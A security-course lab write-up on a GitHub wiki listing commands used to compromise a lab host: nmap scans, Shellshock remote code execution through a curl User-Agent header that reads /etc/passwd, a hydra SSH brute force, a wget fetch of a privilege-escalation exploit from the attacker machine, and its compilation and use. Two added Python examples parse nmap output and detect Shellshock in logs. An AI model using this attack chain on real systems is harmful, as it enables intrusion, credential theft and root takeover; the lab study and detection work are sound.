Activity 4.1 Exploiting Cupcake - Paiet/SEC-335 GitHub Wiki

  • How you determined the versions of the two services exposed by cupcake

nmap -sV 10.0.5.23

  • How you dealt with parsing nmap results with nmaptocsv

sudo nmap --top-ports=100 -Pn 10.0.5.23 -oG test.txt

nmaptocsv -i test.txt -d ","
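The same conversion written out by hand, as an added example for this write-up (it is neither the course's nor the nmaptocsv project's code): it parses the grepable -oG file produced by the nmap command above into one CSV row per host and port, honouring the same delimiter choice as the -d option. SAMPLE_GNMAP is constructed for the example; its hosts, ports and version strings are placeholders, not results from cupcake.

```python
"""Turn nmap grepable (-oG) output into CSV rows, the job nmaptocsv does.

Added example, not the write-up's or nmaptocsv's own code.  SAMPLE_GNMAP
is constructed; the host, port and version values are placeholders.
"""
import csv
import io
import re
import sys

# Field order nmap uses inside each "Ports:" entry of a -oG file:
# port/state/protocol/owner/service/rpcinfo/version/
PORT_FIELDS = ("port", "state", "proto", "owner", "service", "rpc", "version")

# Entries are separated by ", ", but a version string may itself contain a
# comma, so only split where the next entry (digits followed by "/") begins.
ENTRY_SPLIT = re.compile(r",\s*(?=\d+/)")

SAMPLE_GNMAP = """\
# Nmap 7.94 scan initiated Mon Jan  1 00:00:00 2024 as: nmap -sV --top-ports=100 -Pn -oG test.txt 10.0.5.23
Host: 10.0.5.23 ()\tStatus: Up
Host: 10.0.5.23 ()\tPorts: 22/open/tcp//ssh//OpenSSH 0.0 (placeholder, protocol 2.0)/, 80/open/tcp//http//Apache httpd 0.0/, 443/closed/tcp//https///\tIgnored State: filtered (97)
Host: 10.0.5.24 ()\tStatus: Down
# Nmap done at Mon Jan  1 00:00:05 2024 -- 2 IP addresses (1 host up) scanned in 5.00 seconds
"""


def parse_gnmap(text):
    """Return one dict per (host, port) pair found in grepable nmap output."""
    rows = []
    for line in text.splitlines():
        # Comment lines, "Status:" lines and down hosts carry no Ports: field.
        if not line.startswith("Host:") or "Ports:" not in line:
            continue
        # Tab-separated "Key: value" sections: Host / Ports / Ignored State.
        sections = dict(part.split(": ", 1) for part in line.split("\t") if ": " in part)
        host = sections["Host"].split()[0]  # drop the "(hostname)" suffix
        for entry in ENTRY_SPLIT.split(sections["Ports"]):
            values = entry.split("/")[: len(PORT_FIELDS)]
            rows.append({"host": host, **dict(zip(PORT_FIELDS, values))})
    return rows


def to_csv(rows, delimiter=","):
    """Serialise parsed rows as CSV text with a header; delimiter mirrors -d."""
    buf = io.StringIO()
    writer = csv.DictWriter(buf, fieldnames=("host",) + PORT_FIELDS,
                            delimiter=delimiter, lineterminator="\n")
    writer.writeheader()
    writer.writerows(rows)
    return buf.getvalue()


if __name__ == "__main__":
    # Usage: python gnmap2csv.py test.txt   (falls back to the built-in sample)
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_GNMAP
    sys.stdout.write(to_csv(parse_gnmap(text)))
```

The version column is only populated when the scan ran with -sV, as in the first command of this write-up; a plain port scan leaves it empty, which is why the parser tolerates the empty fields.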

  • The techniques you used to invoke remote code execution

nmap -sV -p 80 --script http-shellshock --script-args uri=/cgi-bin/status,cmd="echo ; /usr/bin/whoami" 10.0.5.23

curl -H 'User-Agent: () { :; }; echo ; echo ; /usr/bin/whoami' bash -s :'' http://10.0.5.23/cgi-bin/status
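From the defender's side, the requests above leave a very recognisable trace: the web server passes request headers to the CGI script as environment variables, and a User-Agent or Referer value that begins with a bash function definition, `() {`, is the Shellshock trigger itself. This added example (not part of the write-up) scans Apache combined-format access logs for that signature and ranks hits by whether the request reached a CGI path and succeeded. The log lines are constructed for the example.

```python
"""Flag Shellshock probes in Apache combined-format access logs.

Added example, not from the write-up.  SAMPLE_LOG is constructed; the only
real signature in it is the "() {" prefix that a vulnerable bash parsed as
a function definition when importing environment variables.
"""
import re

# Apache "combined" format:
# ip - user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
# Function-definition prefix; whitespace variants such as "(){" are tolerated.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")
CGI_RE = re.compile(r"/cgi-bin/", re.IGNORECASE)

SAMPLE_LOG = """\
10.0.99.128 - - [01/Jan/2024:10:00:01 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :; }; echo ; echo ; /usr/bin/whoami"
10.0.99.128 - - [01/Jan/2024:10:00:02 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"
10.0.5.7 - - [01/Jan/2024:10:00:03 +0000] "GET /index.html HTTP/1.1" 200 1024 "() { :; }; /bin/id" "curl/7.68.0"
10.0.5.9 - - [01/Jan/2024:10:00:04 +0000] "GET /cgi-bin/status HTTP/1.1" 404 212 "-" "(){ :;}; /bin/true"
"""


def find_shellshock(log_text):
    """Return parsed records whose Referer or User-Agent carries the trigger."""
    hits = []
    for line in log_text.splitlines():
        match = LOG_RE.match(line)
        if not match:
            continue  # not combined format; skip rather than mis-parse
        rec = match.groupdict()
        # Both headers become CGI environment variables (HTTP_REFERER,
        # HTTP_USER_AGENT), so either one can carry the payload.
        tainted = [f for f in ("referer", "agent") if SHELLSHOCK_RE.search(rec[f])]
        if not tainted:
            continue
        rec["fields"] = tainted
        # A 200 on a CGI path means a script actually ran under the
        # attacker-controlled environment; anything else is still a probe.
        hit_cgi = bool(CGI_RE.search(rec["request"])) and rec["status"] == "200"
        rec["severity"] = "high" if hit_cgi else "medium"
        hits.append(rec)
    return hits


if __name__ == "__main__":
    for hit in find_shellshock(SAMPLE_LOG):
        print(f'{hit["severity"]:6} {hit["ip"]:15} {hit["request"]}  via {",".join(hit["fields"])}')
```

The check is deliberately on the function-definition prefix rather than on any particular command, so it also catches probes that only run `/bin/true` or `sleep` to test for the bug; patching bash (and restricting which CGI scripts are exposed at all) is the fix, the log check just tells you whether anyone tried before the patch landed.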

  • The generation of a list of passwords and subsequent ssh brute force

curl -H 'User-Agent: () { :; }; echo ; echo ; /bin/cat /etc/passwd' bash -s :'' http://10.0.5.23/cgi-bin/status

zcat /usr/share/wordlists/rockyou.txt.gz| grep -i samwise > sammy.txt

hydra -l samwise -P sammy.txt 10.0.5.23 -t 4 ssh

  • Transfer of files using python and wget

python3 -m http.server 8086

wget http://10.0.99.128:8086/40839.c

  • Compiling and running a privilege escalation exploit (It can be different than the demo!)

gcc 40839.c -o moose -lpthread -lcrypt

./moose

su - firefart

Reflections